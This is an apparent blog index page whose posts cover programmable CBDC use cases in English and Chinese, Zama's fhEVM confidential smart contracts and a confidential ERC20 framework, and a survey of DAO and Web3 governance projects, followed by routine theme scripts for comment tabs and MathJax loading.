<p><strong>6. Subscription Payments and Recurring Services</strong><br>订阅付款和定期服务<br>CBDCs could automate recurring payments in subscription-based business models:<br>• <em>Automated Subscription Management</em>: CBDCs could be programmed for regular, automated payments (e.g., streaming services, SaaS platforms), simplifying billing and reducing the risk of service disruptions.<br>• <em>Usage-Based Pricing</em>: CBDCs could support “pay-as-you-go” pricing models where charges are automatically applied based on usage, especially useful for cloud services or utilities.</p>
<p><strong>7. Capital Markets and Wholesale CBDC Use Cases</strong><br>资本市场和批发 CBDC 用例<br>For wholesale CBDCs, programmability opens new avenues in capital markets:<br>• <em>Automated Clearing and Settlement</em>: CBDCs could eliminate the need for intermediaries by automatically executing settlements upon matching transaction records between two parties.<br>• <em>Repo and Derivatives Markets</em>: CBDCs can streamline collateral management by automatically adjusting collateral requirements, executing margin calls, or managing repos in real-time based on market fluctuations.</p>
<p><strong>8. Reward Programs and Customer Loyalty</strong><br>奖励计划和客户忠诚度<br>Businesses could use programmable CBDCs for customer reward programs:<br>• <em>Automatic Loyalty Points</em>: CBDCs could be programmed to add loyalty points automatically for every purchase, simplifying the customer experience.<br>• <em>Conditional Rewards</em>: Rewards could be programmed to expire or apply only to specific purchases, making it easy to customize loyalty offers for each customer segment.</p>
<p><strong>9. Carbon Credit and Green Finance</strong><br>碳信用和绿色金融<br>CBDCs could play a role in incentivizing environmentally sustainable behavior:<br>• <em>Carbon Credit Trading</em>: CBDCs could enable automated carbon credit settlements between companies, enforcing green finance commitments.<br>• <em>Green Rewards</em>: Government programs could incentivize green purchases by programming CBDCs to offer discounts or rewards for sustainable activities, such as using public transport or purchasing eco-friendly products.<br>These use cases highlight how CBDC programmability could drive efficiencies, automate compliance, and introduce innovative business models across multiple sectors, benefiting both businesses and consumers.</p>
<p>Programmable CBDCs offer interesting possibilities for end users to create custom payment solutions and manage <strong>personal</strong> finances in new ways. Here are a few examples:</p>
<p><strong>1. Personal Budgeting and Spending Controls</strong><br>个人预算和支出控制<br>• <strong>Automated Savings</strong> 自动储蓄: Users could program a portion of their income (e.g., 10%) to automatically transfer to a savings wallet whenever they receive a paycheck, supporting disciplined saving habits.<br>• <strong>Category-Based Spending Limits</strong> 消费归类: End users could set monthly spending caps for specific categories, such as dining out or entertainment, to better manage their budgets and spending behavior.<br>• <strong>Automatic Rounding for Savings</strong> 储蓄和消费预估: Each purchase could be rounded up to the nearest dollar, with the “extra” going to a savings or investment account—similar to popular savings apps.</p>
<p><strong>2. Shared Wallets for Families or Groups</strong><br>家庭或团体共享钱包<br>• <strong>Family Allowance System</strong>: Parents could set up programmable wallets for children, where funds are released for specific purposes, like school supplies or transportation. Funds could be set to expire if unused within a certain period, encouraging responsible spending.<br>• <strong>Household Expense Management</strong>: Roommates or couples could create a shared wallet programmed to split common expenses like rent, utilities, or groceries automatically, reducing manual tracking and making shared expenses more transparent.</p>
<p><strong>3. Charitable Donations with Conditions</strong><br>有条件的慈善捐赠<br>• <strong>Conditional Charity Donations</strong>: Users could set up automatic donations to charities that activate only when personal income exceeds a certain threshold, allowing them to give back when they are financially able.<br>• <strong>Transparent Donations</strong>: CBDCs could allow donors to see exactly when and how their funds are used by a charity, increasing transparency and engagement with the causes they support.</p>
<p><strong>4. Emergency Funds and Auto-Trigger Insurance</strong><br>应急资金和自动触发保险<br>• <strong>Self-Triggered Emergency Payments</strong>: Users could set up a programmable emergency fund to automatically transfer to their main wallet if their balance falls below a certain level.<br>• <strong>Automated Micro-Insurance Payments</strong>: End users could set up small automatic payments for emergency health or travel insurance, activating only when they cross country borders or travel a specified distance.</p>
<p><strong>5. Conditional Gifting and Allowances</strong><br>有条件的赠与和津贴<br>• <strong>Smart Gifting</strong>: CBDCs could allow users to set up gifts with conditions, such as funds for a child’s education that can only be used for tuition, books, or school supplies.<br>• <strong>Goal-Based Allowances</strong>: Parents could use programmable CBDCs to set up an allowance system that releases funds to their children only after achieving certain goals, like completing homework or chores.</p>
<p><strong>6. Automated Bill Splitting for Social Activities</strong><br>社交活动账单自动分摊<br>• <strong>Social Wallets</strong>: Friends could create a shared, programmable wallet for social events, where each person contributes, and funds are automatically allocated for event-specific expenses, like concert tickets or group dinners.<br>• <strong>Real-Time Expense Tracking</strong>: Programmed CBDCs could split expenses in real-time as they occur, making group activities financially smoother and removing the need for after-the-fact reimbursements.</p>
<p><strong>7. Customizable Travel Budgets and Currency Conversion</strong><br>可定制的旅行预算和货币兑换<br>• <strong>Vacation Budgeting</strong>: Travelers could allocate a specific budget for their trip, where funds automatically convert to the local currency and apply spending limits to ensure they stay within their set vacation budget.<br>• <strong>Location-Based Spending</strong>: Users could set geographic restrictions on their CBDC wallets, preventing them from spending funds outside a designated area or country, adding an extra layer of control and security for travel budgets.</p>
<p><strong>8. Personal Investment Automations</strong><br>个人投资自动化<br>• <strong>Recurring Investments</strong>: End users could program their CBDCs to allocate a small percentage of each paycheck into specific investments or savings accounts, making it easy to automate dollar-cost averaging.<br>• <strong>Goal-Based Investment Triggers</strong>: Users could set up a CBDC wallet to transfer funds to an investment account only if they’ve met other financial goals for the month, like saving or debt repayment targets.</p>
<p><strong>9. Incentivized Health and Wellness Programs</strong><br>激励健康和保健计划<br>• <strong>Rewards for Healthy Activities</strong>: End users could connect programmable CBDCs to health tracking apps to earn micro-payments for activities such as reaching a daily step goal, gym attendance, or purchasing healthy food.<br>• <strong>Goal-Based Health Savings</strong>: CBDCs could also be used to allocate funds to a “health fund” every time a fitness milestone is reached, rewarding users for making healthy choices.</p>
<p><strong>10. Flexible Subscription Management</strong><br>灵活的订阅管理<br>• <strong>Trial Periods with Expiry</strong>: End users could set up subscriptions to only renew if they actively confirm, helping avoid unwanted subscription charges.<br>• <strong>Family Subscription Pools</strong>: Users could program CBDCs to fund family-wide subscriptions where family members contribute proportionally, or enable automatic payments only if usage metrics meet certain thresholds.</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/10/31/fhEVM-confidential-smart-contracts-on-the-EVM-using-FHE/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/10/31/fhEVM-confidential-smart-contracts-on-the-EVM-using-FHE/" class="post-title-link" itemprop="url">fhEVM-confidential-smart-contracts-on-the-EVM-using-FHE</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-10-31 16:54:00" itemprop="dateCreated datePublished" datetime="2024-10-31T16:54:00+08:00">2024-10-31</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">Edited on</span>
<time title="Modified: 2024-11-15 14:18:37" itemprop="dateModified" datetime="2024-11-15T14:18:37+08:00">2024-11-15</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h2 id="https-github-com-zama-ai-fhevm"><a href="#https-github-com-zama-ai-fhevm" class="headerlink" title="https://github.com/zama-ai/fhevm"></a><a target="_blank" rel="noopener" href="https://github.com/zama-ai/fhevm">https://github.com/zama-ai/fhevm</a></h2><p><strong>fhEVM</strong> is a technology that enables confidential smart contracts on the EVM using fully homomorphic encryption (FHE).</p>
<ul>
<li><strong>Solidity integration:</strong> fhEVM contracts are simple solidity contracts that are built using traditional solidity toolchains.</li>
<li><strong>Simple developer experience:</strong> Developers can use the <code>euint</code> data types to mark which part of their contracts should be private.</li>
<li><strong>Programmable privacy:</strong> All the logic for access control of encrypted states is defined by developers in their smart contracts.</li>
<li><strong>High precision encrypted integers :</strong> Up to 256 bits of precision for integers</li>
<li><strong>Full range of operators :</strong> All typical operators are available: <code>+</code>, <code>-</code>, <code>*</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code>, <code>==</code>, …</li>
<li><strong>Encrypted if-else conditionals :</strong> Check conditions on encrypted states</li>
<li><strong>On-chain PRNG :</strong> Generate secure randomness without using oracles</li>
<li><strong>Configurable decryption :</strong> Threshold, centralized or KMS decryption</li>
<li><strong>Unbounded compute depth:</strong> Unlimited consecutive FHE operations<br>Even Circle built a confidential ERC20 on fhEVM — <a target="_blank" rel="noopener" href="https://github.com/Inco-fhevm/confidential-erc20-framework">https://github.com/Inco-fhevm/confidential-erc20-framework</a>.<br>Let’s dive deeper into it:<h2 id="Decrypt-and-reencrypt"><a href="#Decrypt-and-reencrypt" class="headerlink" title="Decrypt and reencrypt"></a>Decrypt and reencrypt</h2>On the fhEVM blockchain built by the ZAMA team, the network private key is held by a Key Management Service (KMS), so the confidentiality of every encrypted value ultimately rests on the custody of that key. If the plaintext value is needed at some point, there are two ways to obtain it. Both methods are handled by a service called the Gateway.<br>fhEVM allows explicit decryption requests for any encrypted type. The values are decrypted with the network private key.<br><img src="/2024/10/31/fhEVM-confidential-smart-contracts-on-the-EVM-using-FHE/1.png" alt=""><br>Detailed implementation: <a target="_blank" rel="noopener" href="https://docs.zama.ai/fhevm/guides/decrypt">https://docs.zama.ai/fhevm/guides/decrypt</a></li>
</ul>
<p>Reencryption is performed on the client side by calling the gateway service using the <a target="_blank" rel="noopener" href="https://github.com/zama-ai/fhevmjs/">fhevmjs</a> library.</p>
<p>Zama has another project of FHE on AI — <a target="_blank" rel="noopener" href="https://github.com/zama-ai/concrete-ml">https://github.com/zama-ai/concrete-ml</a></p>
<h2 id="confidential-erc20"><a href="#confidential-erc20" class="headerlink" title="confidential-erc20"></a>confidential-erc20</h2><p><a target="_blank" rel="noopener" href="https://www.inco.org/" title="https://www.inco.org/">https://www.inco.org/</a> and <a target="_blank" rel="noopener" href="https://www.circle.com/en/circle-research">Circle</a> published a framework, <a target="_blank" rel="noopener" href="https://github.com/Inco-fhevm/confidential-erc20-framework">https://github.com/Inco-fhevm/confidential-erc20-framework</a>, which builds on <strong>fhEVM</strong> and:</p>
<ul>
<li>conceals balances;</li>
<li>conceals transaction amounts;</li>
<li>supports optional viewing and transfer rules to meet regulatory obligations or enhance programmatic risk management;</li>
<li>the counterparties’ addresses are still published on the public blockchain;</li>
<li>the private key is likewise held by a KMS service.</li>
</ul>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/" class="post-title-link" itemprop="url">Status-Update-DAO-Data&project-management-and-governance-by-Web3</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-10-31 16:08:00" itemprop="dateCreated datePublished" datetime="2024-10-31T16:08:00+08:00">2024-10-31</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">Edited on</span>
<time title="Modified: 2024-11-15 14:21:34" itemprop="dateModified" datetime="2024-11-15T14:21:34+08:00">2024-11-15</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p><a target="_blank" rel="noopener" href="https://kosmos.org/">https://kosmos.org/</a> is developing a free, open-source, and user-centric alternative to centralized group chat platforms. They offer the following projects (<a target="_blank" rel="noopener" href="https://kosmos.org/projects/">https://kosmos.org/projects/</a>):</p>
<h3 id="1-Kosmos-Accounts-amp-Services"><a href="#1-Kosmos-Accounts-amp-Services" class="headerlink" title="1) Kosmos Accounts & Services"></a>1) Kosmos Accounts & Services</h3><p>Kosmos Accounts give people access to Kosmos hosted services.</p>
<h3 id="2-Kosmos-Chat"><a href="#2-Kosmos-Chat" class="headerlink" title="2) Kosmos Chat"></a>2) Kosmos Chat</h3><p>Kosmos Chat is a group chat application. All of its components can be either self-hosted or connected to hosted services. <strong>No user data is ever locked into hosted silos</strong>.</p>
<h3 id="3-Kredits-—-https-kredits-kosmos-org-dashboard"><a href="#3-Kredits-—-https-kredits-kosmos-org-dashboard" class="headerlink" title="3) Kredits — https://kredits.kosmos.org/dashboard"></a>3) Kredits — <a target="_blank" rel="noopener" href="https://kredits.kosmos.org/dashboard">https://kredits.kosmos.org/dashboard</a></h3><p>Kredits are a system for tracking open-source project contributions, enabling and facilitating the fair and transparent use of project funds, as well as improving project management and governance.<br><a target="_blank" rel="noopener" href="https://wiki.kosmos.org/Kredits">https://wiki.kosmos.org/Kredits</a></p>
<h4 id="High-level-overview"><a href="#High-level-overview" class="headerlink" title="High-level overview"></a>High-level overview</h4><p><img src="/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/1.png"></p>
<h3 id="Similar-projects-ideas"><a href="#Similar-projects-ideas" class="headerlink" title="Similar projects/ideas"></a>Similar projects/ideas</h3><ol>
<li><a target="_blank" rel="noopener" href="https://colony.io/">https://colony.io/</a> — Colony is a DAO which exists to make it easy for others to build DAOs.<br> <strong>How Colony Makes Money</strong><br><img src="/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/2.png"></li>
</ol>
<ul>
<li>The Colony Network levies a small fee on Payments leaving a colony to an external address.</li>
<li>Fees paid in whitelisted tokens like USDC, USDT, WETH or xDAI go to the Metacolony to incentivise contributors.</li>
<li>Fees paid in other ERC20 tokens go to auctions where token buyers can purchase ERC20 tokens using CLNY, which is burned.</li>
</ul>
<ol start="2">
<li><p><a target="_blank" rel="noopener" href="https://github.com/Commonfare-net/macao-social-wallet">https://github.com/Commonfare-net/macao-social-wallet</a> , <a target="_blank" rel="noopener" href="https://freecoin.dyne.org/">https://freecoin.dyne.org/</a> — Freecoin is a set of tools to let people run <strong>reward schemes</strong> that are <strong>transparent and auditable</strong> to other organisations. It is made for <strong>participatory and democratic organisations</strong> who want to incentivise participation, unlike centralised banking databases.</p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://giveth.io/">https://giveth.io/</a> — Support global projects in the fields of public goods, sustainability and regeneration through cryptocurrency donations. <a target="_blank" rel="noopener" href="https://github.com/Giveth">https://github.com/Giveth</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.gitcoin.co/">https://www.gitcoin.co/</a> — through the Gitcoin Grants Program, Gitcoin has distributed over $60M to early-stage builders championing projects across DeFi, climate, open source and beyond.</p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://shapeshift.com/">https://shapeshift.com/</a> — ShapeShift champions the principles of permissionless access, trustless operations, privacy, and non-custodial asset management, providing users with a secure and autonomous digital currency management experience. ShapeShift supports 150+ different wallets including MetaMask, Ledger, xDeFi, WalletConnect, Coinbase, and Keplr.<br><img src="/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/3.png"></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://activitypods.org/">https://activitypods.org/</a> , <a target="_blank" rel="noopener" href="https://github.com/activitypods/activitypods">https://github.com/activitypods/activitypods</a> — Solid (Social Linked Data) is a set of specifications whose aim is to allow users to store all their data in Pods (“Personal Online Datastores”). Users have full control over their Pods and can give permissions to applications or people they trust. <a target="_blank" rel="noopener" href="https://solidproject.org/">https://solidproject.org/</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.hyphanet.org/">https://www.hyphanet.org/</a> , <a target="_blank" rel="noopener" href="https://github.com/hyphanet/fred">https://github.com/hyphanet/fred</a> — a peer-to-peer platform for <strong>censorship-resistant</strong> and <strong>privacy-respecting</strong> publishing and communication.</p>
</li>
</ol>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<nav class="pagination">
<span class="page-number current">1</span><a class="page-number" href="/page/2/">2</a><span class="space">…</span><a class="page-number" href="/page/53/">53</a><a class="extend next" rel="next" href="/page/2/"><i class="fa fa-angle-right" aria-label="Next page"></i></a>
</nav>
<script>
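// Restores the comment tab that was active on the reader's last visit and
// remembers the tab they switch to. Driven by the theme's `tabs:register` /
// `tabs:click` events and by CONFIG.comments (defined elsewhere on the page).
window.addEventListener('tabs:register', () => {
  let { activeClass } = CONFIG.comments;
  if (CONFIG.comments.storage) {
    let stored = null;
    try {
      stored = localStorage.getItem('comments_active');
    } catch (err) {
      // Storage access can throw when site data is blocked; keep the default.
      stored = null;
    }
    // The stored value is interpolated into a CSS selector below, so only a
    // plain class-like token is accepted; anything else (quotes, brackets)
    // would make querySelector throw and abort tab restoration entirely.
    if (stored && /^[A-Za-z0-9_-]+$/.test(stored)) {
      activeClass = stored;
    }
  }
  if (activeClass) {
    const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
    if (activeTab) {
      activeTab.click();
    }
  }
});
if (CONFIG.comments.storage) {
  window.addEventListener('tabs:click', event => {
    if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
    // The pane's second class names the comment system; skip when it is
    // missing so the literal string "undefined" is never persisted.
    const commentClass = event.target.classList[1];
    if (!commentClass) return;
    try {
      localStorage.setItem('comments_active', commentClass);
    } catch (err) {
      // Storage blocked or quota exceeded: remembering the tab is best-effort.
    }
  });
}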
</script>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<div class="copyright">
©
<span itemprop="copyrightYear">2024</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">Weiming Zhuang</span>
</div>
</div>
</footer>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>
<script src="/js/local-search.js"></script>
<script>
// MathJax bootstrap. On first run it publishes the MathJax configuration and
// injects the CDN bundle; when MathJax is already present (e.g. this script
// running again on an already-loaded page) it resets the typesetting state
// and re-typesets the current document instead.
if (typeof MathJax === 'undefined') {
  // After each typeset pass, mark lists whose items contain rendered math
  // with a `has-jax` class (presumably consumed by the theme's stylesheet).
  const flagListsContainingMath = () => {
    document.querySelectorAll('mjx-container').forEach(container => {
      const holder = container.parentNode;
      if (holder.nodeName.toLowerCase() === 'li') {
        holder.parentNode.classList.add('has-jax');
      }
    });
  };
  window.MathJax = {
    tex: {
      inlineMath: {'[+]': [['$', '$']]},
      tags: 'none'
    },
    options: {
      renderActions: {
        insertedScript: [200, flagListsContainingMath, '', false]
      }
    }
  };
  // NOTE(review): the bundle is fetched from a third-party CDN with no
  // `integrity` (SRI) hash, so a substituted CDN response would run with full
  // page privileges; the version segment of this URL also looks mangled by
  // extraction — confirm the pinned version before adding a hash.
  const loader = document.createElement('script');
  loader.src = 'https://cdn.jsdelivr.net/npm/[email protected]/es5/tex-mml-chtml.js';
  loader.defer = true;
  document.head.appendChild(loader);
} else {
  MathJax.startup.document.state(0);
  MathJax.typesetClear();
  MathJax.texReset();
  MathJax.typeset();
}
</script>
</body>
</html>